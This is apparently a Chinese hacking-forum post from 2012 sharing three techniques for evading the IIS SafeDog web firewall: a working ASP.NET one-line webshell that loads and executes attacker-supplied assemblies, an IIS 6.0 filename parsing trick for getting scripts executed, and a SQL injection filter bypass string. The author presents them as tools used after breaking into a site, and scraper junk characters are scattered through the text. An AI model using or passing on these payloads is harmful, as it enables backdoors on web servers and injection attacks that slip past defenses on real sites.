1、绕过IIS安全狗的一句话。# x# R3 |# L. o; U5 p
前几天测试一个网站。找到突破口之后,写入webshell,但服务器上装有IIS安全狗,平时常用的一句话或者shell都用不了。下面这段.net一句话可以突破。3 h8 w- V: A. ~) n, \
<%@ Page Language="C#" ValidateRequest="false" %> <%try{System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["admin163.net"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null,null); } catch { }%>连接端用cncert的aspx一句话客户端。
! J8 b5 j( @3 z) ?$ m- C8 o* X: J4 ?$ Z$ S
2、IIS6.0解析漏洞遇到安全狗。
3 Y/ R6 y$ V+ k/ i9 D文件名为
$ }/ z$ l( |: |8 d3 X$ ~; x6 ghttp://www.xxxxx.com/sh3llc0de.asp;1.jpg0 s# k& ~* F) @
; I3 u) I, B& p' ]* @) [5 k4 ^
这样的会被IIS安全狗果断屏蔽。
$ I& D, T7 N+ i3 H" m1 @改成如下名称,IIS6一样会解析:
4 I, `& w; [2 Hwww.xxxxx.com/;1.asp;1.jpg
! B& L+ {7 a$ u$ \% A5 r- v
; @: l& V. N2 p: b3、安全狗的注入绕过。
/ ^# O9 R* E. Q& D9 A; L常用的如r00ts.asp?id=1 and 1=1 是会被安全狗屏蔽的。# y. J7 g2 }$ N* {. D# [
但如果:
6 L8 p6 a; t& |0 Dr00ts.asp?r00ts.com=%00.&id=69%20 and 1=1
! [9 {& D' n9 u就可以成功绕过了。
) G* s# }+ B: r
, }4 D+ n# F% u' u2 j
- J$ G6 f. \- `, t9 l d" c+ |" S |
发表于 2012-10-31 08:25:30
收藏
支持
反对